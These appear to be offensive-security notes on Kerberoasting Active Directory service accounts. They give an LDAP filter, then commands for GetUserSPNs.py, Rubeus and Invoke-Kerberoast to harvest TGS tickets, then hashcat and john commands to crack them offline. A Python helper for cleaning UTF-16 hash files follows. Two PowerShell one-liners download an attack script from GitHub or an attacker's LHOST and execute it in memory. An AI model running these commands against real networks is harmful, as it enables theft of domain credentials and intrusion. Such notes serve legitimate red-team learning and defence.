3. Kerberoasting
- harvesting TGS tickets for services (SPNs) registered to user accounts
- the TGS ticket is encrypted with the service account's key, so it can be cracked offline to recover that account's password
- requires a domain account that is allowed to request TGS tickets; in practice any domain account, since no special privileges are required
- LDAP query to retrieve user accounts with associated services (SPNs):
- (&(samAccountType=805306368)(servicePrincipalName=*))
- first clause (samAccountType=805306368): user accounts ONLY (no computer accounts)
- second clause (servicePrincipalName=*): only accounts with at least one SPN registered
Tools: impacket’s GetUserSPNs.py (Linux), Rubeus (Windows)
Linux
GetUserSPNs.py DOMAIN/USERNAME:PASSWORD -dc-ip $IP -save -outputfile FILE
Windows
.\Rubeus.exe kerberoast /outfile:HASHFILE
Invoke-Kerberoast (Empire project)
Another way to perform Kerberoasting is Invoke-Kerberoast from the Empire project, which can be loaded directly into memory from GitHub (provided the host has internet access; otherwise download the script to a local web server and load it from there)
Load module from GitHub
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Load module from a local web server (LHOST)
iex (new-object Net.WebClient).DownloadString("http://LHOST/Invoke-Kerberoast.ps1")
Execute
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII HASHFILE
Cracking the TGS-REP hash
hashcat
hashcat -m 13100 HASHFILE WORDLIST
NOTE: hashcat may reject the hash file with an error similar to "Byte Order Mark (BOM) was detected". This happens when the input file is Unicode (UTF-16) encoded, which is the default for many Windows output files, instead of ASCII. To fix it, convert the file with dos2unix (or write it with -Encoding ASCII in the first place, as in the Invoke-Kerberoast command above).
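As an added example (not part of these notes, and not from any of the tools above), a small Python helper that detects a BOM/UTF-16 encoded hash file, rewrites it as ASCII with LF endings, and keeps only well-formed krb5tgs lines so hashcat/john accept it. The sample hash line, its hex payload and the account/SPN names are constructed.

```python
import re
from typing import List, Optional

# Kerberoast hash line as written by GetUserSPNs.py, Rubeus and Invoke-Kerberoast
# (hashcat -m 13100 / john krb5tgs): $krb5tgs$23$*user$REALM$spn*$checksum$edata
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$23\$\*[^$*]+\$[^$*]+\$[^*]+\*\$[0-9a-fA-F]{32}\$[0-9a-fA-F]+$"
)

# Leading byte-order marks and the codec that decodes the rest of the file
BOMS = (
    (b"\xef\xbb\xbf", "utf-8-sig"),  # UTF-8 with BOM
    (b"\xff\xfe", "utf-16"),         # UTF-16 LE (Windows Out-File default)
    (b"\xfe\xff", "utf-16"),         # UTF-16 BE
)


def detect_bom(raw: bytes) -> Optional[str]:
    """Return the codec implied by a leading BOM, or None if there is no BOM."""
    for marker, codec in BOMS:
        if raw.startswith(marker):
            return codec
    return None


def normalize_hashfile(raw: bytes) -> List[str]:
    """Decode a hash file (BOM/UTF-16 tolerant), drop CRLF, keep valid krb5tgs lines."""
    codec = detect_bom(raw) or "utf-8"   # plain ASCII/UTF-8 file needs no conversion
    text = raw.decode(codec)             # the utf-16 / utf-8-sig codecs consume the BOM
    lines = []
    for line in text.splitlines():       # splitlines() also handles Windows \r\n
        line = line.strip()
        if line and KRB5TGS_RE.match(line):
            lines.append(line)
    return lines


def write_ascii(path: str, raw: bytes) -> int:
    """Rewrite the hash file as ASCII with LF endings; returns number of hashes kept."""
    hashes = normalize_hashfile(raw)
    with open(path, "w", encoding="ascii", newline="\n") as fh:
        for h in hashes:
            fh.write(h + "\n")
    return len(hashes)


# Constructed sample: one hash line as Out-File writes it without -Encoding ASCII
# (UTF-16 with BOM, CRLF line endings). The hex payload is made up, not a real ticket.
SAMPLE_HASH = (
    "$krb5tgs$23$*svc_sql$EXAMPLE.LOCAL$MSSQLSvc/db01.example.local:1433*$"
    + "0123456789abcdef0123456789abcdef$" + "deadbeef" * 8
)
SAMPLE_FILE = (SAMPLE_HASH + "\r\n\r\n").encode("utf-16")  # Python prepends the BOM

if __name__ == "__main__":
    print(detect_bom(SAMPLE_FILE), normalize_hashfile(SAMPLE_FILE))
```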
john
john --format=krb5tgs --wordlist=WORDLIST HASHFILE